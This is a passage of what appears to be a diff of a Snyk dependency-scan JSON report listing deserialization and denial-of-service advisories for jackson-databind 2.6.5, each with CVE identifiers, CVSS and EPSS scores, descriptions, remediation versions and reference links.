"CWE-502" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2021-01-07T13:37:54.679882Z", - "functions_new": [ - { - "version": [ - "[,2.9.10.8)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2021-01-07T13:37:04Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2021-01-07T16:40:33.089230Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:23.824076Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056426", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.9.10.8)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "2.9.10.8" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.10.8)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2996", - "title": "GitHub Issue" - }, - { - "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", - "title": "Medium Article" - }, - { - "url": "https://github.com/Al1ex/CVE-2020-36188", - "title": "PoC" - } - ], - "cvssDetails": [ - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:48:38.922274Z" - }, - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:03.468032Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:59:42.488317Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:48:38.922274Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:03.468032Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `com.newrelic.agent.deps.ch.qos.logback.core.db.JNDIConnectionSource`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2996)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [PoC](https://github.com/Al1ex/CVE-2020-36188)\n", - "epssDetails": { - "percentile": "0.66225", - "probability": "0.00262", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-36188" - ], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2021-01-07T13:39:28.531700Z", - "functions_new": [ - { - "version": [ - "[,2.9.10.8)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2021-01-07T13:38:32Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2021-01-07T16:40:32Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:03.468032Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056427", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[, 2.9.10.8)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "2.9.10.8" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[, 2.9.10.8)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/issues/3004", - "title": "GitHub Issue" - }, - { - "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", - "title": "Medium Article" - }, - { - "url": "https://github.com/Al1ex/CVE-2020-36179", - "title": "Poc" - } - ], - "cvssDetails": [ - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:23.854860Z" - }, - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:24.686589Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:59:37.757298Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:23.854860Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:24.686589Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.tomcat.dbcp.dbcp.cpdsadapter.DriverAdapterCPDS`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/3004)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [Poc](https://github.com/Al1ex/CVE-2020-36179)\n", - "epssDetails": { - "percentile": "0.66225", - "probability": "0.00262", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-36181" - ], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2021-01-07T13:41:09.172252Z", - "functions_new": [ - { - "version": [ - "[, 2.9.10.8)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2021-01-07T13:38:31Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2021-01-07T16:40:32Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:24.686589Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1061931", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "credit": [ - "Yangkun (ICSL)" - ], - "semver": { - "vulnerable": [ - "[,2.9.10.7)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.9.10.7" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.10.7)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/7dbf51bf78d157098074a20bd9da39bd48c18e4a", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2854", - "title": "GitHub Issue" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/releases/tag/jackson-databind-2.9.10.7", - "title": "GitHub Release" - }, - { - "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1916633", - "title": "RedHat Bugzilla Bug" - } - ], - "cvssDetails": [ - { - "assigner": "SUSE", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:49:37.142422Z" - }, - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:50:15.847219Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:17.193594Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:57:04.169362Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "SUSE", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:49:37.142422Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:50:15.847219Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:17.193594Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. A malicious user could perform a SSRF attack via the `javax.swing` gadget (specifically `javax.swing.JTextPane`).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.7 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/7dbf51bf78d157098074a20bd9da39bd48c18e4a)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2854)\n- [GitHub Release](https://github.com/FasterXML/jackson-databind/releases/tag/jackson-databind-2.9.10.7)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1916633)\n", - "epssDetails": { - "percentile": "0.74700", - "probability": "0.00431", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2021-20190" - ], - "CWE": [ - "CWE-502", - "CWE-918" - ], - "GHSA": [ - "GHSA-5949-rw7g-wx7w" - ], - "RHSA": [ - "RHSA-1610966837463990" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2021-01-18T12:50:16.466618Z", - "functions_new": [ - { - "version": [ - "[,2.9.10.7)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2021-01-16T00:00:00Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2021-01-18T17:23:46Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:17.193594Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-174736", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:R", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[2.9.0,2.9.9)", - "[2.8.0,2.8.11.4)", - "[2.7.0,2.7.9.6)", - "[,2.6.7.3)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "2.9.9", - "2.8.11.4", - "2.7.9.6", - "2.6.7.3" - ], - "patches": [], - "insights": { - "triageAdvice": "This vulnerability is only applicable on systems using MySQL database" - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.9)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/dda513bd7251b4f32b7b60b1c13740e3b5a43024", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2326", - "title": "GitHub Issue" - }, - { - "url": "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.9", - "title": "Github Release Tag" - }, - { - "url": "https://github.com/Al1ex/CVE-2019-12086", - "title": "PoC" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:47:31.553438Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:53:49.785293Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:R", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:55:55.897269Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "assigner": "NVD", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:47:31.553438Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:53:49.785293Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. When Default Typing is enabled for an externally exposed JSON endpoint, the service has the mysql-connector-java jar in the classpath. An attacker can host a crafted MySQL server reachable by the victim and send a crafted JSON message that allows them to read arbitrary local files on the server. This occurs due to missing `com.mysql.cj.jdbc.admin.MiniAdmin` validation.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.9, 2.8.11.4, 2.7.9.6, 2.6.7.3 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/dda513bd7251b4f32b7b60b1c13740e3b5a43024)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2326)\n- [Github Release Tag](https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.9)\n- [PoC](https://github.com/Al1ex/CVE-2019-12086)\n", - "epssDetails": { - "percentile": "0.74218", - "probability": "0.00415", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2019-12086" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-5ww9-j83m-q7qx" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2019-05-19T10:19:10.287403Z", - "functions_new": [ - { - "version": [ - "[,2.9.9)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2019-05-17T18:12:58Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2019-05-17T18:12:58Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:49.785293Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-2421244", - "title": "Denial of Service (DoS)", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[, 2.12.6.1)", - "[2.13.0, 2.13.2.1)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ 